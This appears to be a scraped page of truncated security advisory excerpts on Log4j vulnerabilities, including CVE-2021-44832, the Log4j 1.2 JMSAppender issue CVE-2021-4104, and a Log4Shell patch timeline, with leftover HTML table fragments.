Log4j 2.17.1 Released for CVE-2021-44832

NOTE: 12/30 IPS signature information added FortiGuard Labs is aware of a newly disclosed remote code execution vulnerability affecting Log4j. Assigned CVE-2021-44832, this vulnerability allows for a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.There has been confusion on Twitter as to whether this is actually a remote code execution (RCE) or arbitrary code execution (ACE) vulnerability. Researcher Yaniv Naziry (@YNizry) initially stated today that a new RCE vulnerability related to Log4j is to be announced, and later retracted their initial statement confirming that it is indeed arbitrary code execution and not remote code execution. Compounding matters, Apache classifies CVE-2021-44832 as a remote code execution vulnerability. In the writeup for CVE-2021-44832, Apache states that the atta..

JMSAppender – Log4j 1.2 Vulnerability CVE-2021-4104

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default.

This table will cover the Apache Log4j 1.2 vulnerability impacting the SonicWall products.

<td width="240" nowrap="" style="width:179.75pt;border:solid windowtext 1.0pt;
mso-border-alt:solid windowtext .5pt;background:#ED7D31;padding:0in 5.4pt 0in 5..

Apache Log4j Remote Code Execution Vulnerability – “Log4Shell” CVE-2021-44228, CVE-2021-45046, CVE-2021-45105

This advisory will cover the Apache Log4j suite of vulnerabilities impacting the 2.x branch, CVE-2021-44228 being the most Critical (CVSS 10.0).

  • – On December 10, 2021, Apache released Log4j 2.15.0 for Java 8 users to address a remote code execution (RCE) vulnerability—CVE-2021-44228.
  • – On December 13, 2021, Apache released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address a RCE vulnerability—CVE-2021-45046.
  • – On December 17, 2021, Apache released Log4j 2.17.0 for Java 8 users to address a denial-of-service (DOS) vulnerability—CVE-2021-45105.
  • – On December 28, 2021, Apache released Log4j 2.17.1 for Java 8 users to address a RCE vulnerability—CVE-2021-44832.
<tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;height:1..